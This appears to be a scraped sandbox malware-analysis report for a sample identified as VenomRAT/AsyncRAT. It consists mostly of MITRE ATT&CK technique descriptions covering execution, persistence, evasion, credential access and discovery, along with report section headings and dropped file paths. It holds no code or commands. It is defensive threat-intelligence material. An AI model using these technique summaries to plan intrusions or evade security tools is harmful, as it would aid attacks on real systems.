Instruction ID: f175d84be376ab0cd151cc0a80c7ca3d3dd8dc503441567dc62b737e93420db3
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 2301677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VenomRAT

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_d0dade14ed85bb72d26ae77e109bbc7dc756ccbd_49c2e667_518c2b53-7995-485b-ba50-7e6c2e78dcc7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3812.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CA7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D25.tmp.xml

C:\Users\Public\SSSS.log

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre